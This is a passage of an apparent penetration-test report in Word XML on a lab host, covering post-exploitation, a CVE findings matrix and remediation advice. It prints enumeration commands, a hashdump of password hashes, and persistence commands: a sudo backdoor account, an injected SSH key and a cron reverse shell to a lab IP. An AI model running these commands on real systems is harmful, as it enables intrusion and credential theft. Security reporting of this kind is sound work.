        <w:t>6.1 System Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00CD5C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>After gaining shell access, the following enumeration was performed to map the target environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D34AB8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uname -a                         # OS and kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE637E8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cat /etc/issue                   # Distribution info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB889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cat /etc/passwd                  # All system user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2C884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id &amp;&amp; whoami                     # Current privilege level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C33F62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ps aux                           # Running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A633FDC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netstat -antp                    # Active network connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95A9AD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find / -perm -4000 2&gt;/dev/null   # SUID binary enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B18A7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df -h                            # Disk usage and mount points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0DB176" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Password Hash Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015DB9D6" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Using Meterpreter's built-in hashdump module to extract hashed credentials from /etc/shadow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF028A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meterpreter &gt; hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0119A9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root:$1$Yr3VFqK5$yXqFp.ENKdsG3rwFRmDnH/:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01425035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msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BB361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user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED7DF0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Note: Extracted hashes can be cracked offline using John the Ripper or Hashcat for further privilege analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69051C21" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Persistence Mechanisms (Demonstrated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041503D2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The following persistence techniques were demonstrated for educational documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35403CFF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Creating a privileged backdoor user account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70D4D4" w14:textId="77777777" w:rsidR="00905B5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333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>useradd -m -p $(openssl passwd -1 password) -s /bin/bash -G sudo backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1D330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Adding SSH authorized key for persistent remote access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F89D1" w14:textId="77777777" w:rsidR="00905B5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333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo '&lt;attacker_pub_key&gt;' &gt;&gt; /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6E54E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Cron-based reverse shell for scheduled persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395794AA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="72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echo '*/5 * * * * root bash -i &gt;&amp; /dev/tcp/192.168.56.104/4444 0&gt;&amp;1' &gt;&gt; /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF017E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Sensitive Data Access (Simulated Exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F192068" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The following sensitive resources were accessed to demonstrate the impact of a successful compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD0355" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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000"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="67AB5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5ADA5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35DA6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C6075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D0FFE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905B53" w14:paraId="75C59B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AA571" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Shadow 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F9BF10" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/etc/shadow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238895" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hashed credentials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3B5F58" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Account takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="022C24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D9DA60" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH private keys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9B6593" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/root/.ssh/id_rsa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9483EF" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RSA private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961EE6" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="4446BC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7EB014" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web app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35F5D8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/var/www/dvwa/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250C5B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PHP source code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57AAF8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Code disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="4E1741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A754AB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MySQL databases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6809F2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql -u root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2835A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All DB records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85BFAE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full data breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="68782C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3C0D5A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache config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D92B2F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/etc/apache2/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5A7CB9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server config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6F8619" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Infrastructure mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65408BB4" w14:textId="77777777" w:rsidR="00905B5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"/>
        <w:gridCol w:w="8430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="7DA1F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C634F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07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FBAD59F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Findings Summary &amp; Risk Matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A371CB9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B5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347"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1214"/>
        <w:gridCol w:w="1203"/>
        <w:gridCol w:w="2651"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="00159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5D1EE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36071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7A5BE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CVE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E49EE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71C7B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Exploited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C7F8A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905B53" w14:paraId="3B8E98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5BC603" w14:textId="77777777" w:rsidR="00905B5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84006" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 Backdoor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4D12F9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2011-2523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DDD0C5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9EE837" w14:textId="77777777" w:rsidR="00905B53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3F46DE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root RCE — No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="2D3C29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6B152A" w14:textId="77777777" w:rsidR="00905B53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17D72E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba usermap_script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A6E146" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2007-2447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1CDABA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FFD00F" w14:textId="77777777" w:rsidR="00905B53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DDC785" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root RCE — No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7CA73A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1050A9" w14:textId="77777777" w:rsidR="00905B53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F362B3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UnrealIRCd Backdoor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1E37E2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2010-2075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529E30" w14:textId="77777777" w:rsidR="00905B53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8B5D0C" w14:textId="77777777" w:rsidR="00905B53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D6563" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root RCE — No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="64BEA9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6E533E" w14:textId="77777777" w:rsidR="00905B53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7C352F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telnet Cleartext Auth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1126BD" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-1999-0619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07F243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E5A065" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed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473B67" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="0D41F9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84C69D" w14:textId="77777777" w:rsidR="00905B53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C41DCB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DVWA SQL Injection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B7EDC2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-89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28F7D3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85D61" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed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E3124D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full DB Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="733992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0AA231" w14:textId="77777777" w:rsidR="00905B53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FCF23E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache Tomcat Weak Creds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E5F017" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2009-3843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388BB5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546110" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed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1C997F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web Shell Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7DF082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B7F6E8" w14:textId="77777777" w:rsidR="00905B53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87C113" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VNC No Authentication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06E8D9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2006-2369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1F8961" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E07000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E5F8BA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed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83B62B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full Desktop Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="122186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D7A9BA" w14:textId="77777777" w:rsidR="00905B53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970CBB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL Anonymous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D01256" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2012-2122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5C5420" w14:textId="77777777" w:rsidR="00905B53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402CD" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed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BC4EA2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database Read Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B3A5A4C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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8410"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="357B7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6EF72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73CE073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Remediation Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C508096" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1761E45E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Critical — Immediate Action Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2182B6E1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vsftpd: Remove version 2.3.4 immediately. Upgrade to vsftpd 3.0.5 or later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE8937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Samba: Patch CVE-2007-2447 and upgrade to Samba 4.x. Disable SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2D4A6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UnrealIRCd: Replace with a verified clean build. Disable if IRC is not required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34E40F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Telnet: Disable telnetd entirely (systemctl disable telnet). Use SSH exclusively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471DE1C0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 High Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A5578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VNC: Enable VNC authentication and restrict access via firewall rules to trusted IPs only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DCAD0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MySQL: Disable anonymous login. Enforce strong passwords. Restrict to localhost only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A6ED2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Apache Tomcat: Change default admin credentials. Restrict /manager to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA3F49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DVWA: Implement prepared statements and input validation to prevent SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ABAEC" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 General Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381BCB0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Patch Management: Implement automated OS and application patching on a regular cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43307452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Firewall: Enable UFW or iptables. Allow only explicitly required ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB3319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Network Segmentation: Isolate services into separate VLANs. Apply least-privilege access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E142099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Monitoring: Deploy SIEM (Splunk / ELK Stack) with alerting for anomalous activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533513F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IDS/IPS: Deploy Snort or Suricata to detect and block exploit attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC09230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MFA: Enable multi-factor authentication for all remote access services (SSH, VPN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B50D09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Principle of Least Privilege: Audit and minimize permissions for all users and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1E4B1" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Regular Audits: Schedule quarterly vulnerability assessments and annual penetration tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F2CA6" w14:textId="77777777" w:rsidR="00905B5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8065"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="7BF20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0A7B0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09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CFDB414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Tools &amp; Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FC43B31" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="12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800"/>
        <w:gridCol w:w="1160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="543DF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F87C3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83030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D6E16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53B3A" w14:textId="77777777" w:rsidR="00905B53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905B53" w14:paraId="2EDBD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13B80A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux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884780" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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2BDA9C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker machine with pre-installed security toolkit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6E55BD" w14:textId="62622E8E" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r w:rsidR="001B378F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</w:t>
            </w:r>
            <w:r w:rsidR="001B378F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="3930E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C3B7F8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploit Framework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757484" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation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03DA79" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit modules, payloads, post-exploitation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E12AB9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.4.99-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="3BB53A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5E2888" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msfconsole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45A845" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation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55481F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Interactive Metasploit console interface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BC73DA" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.4.99-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
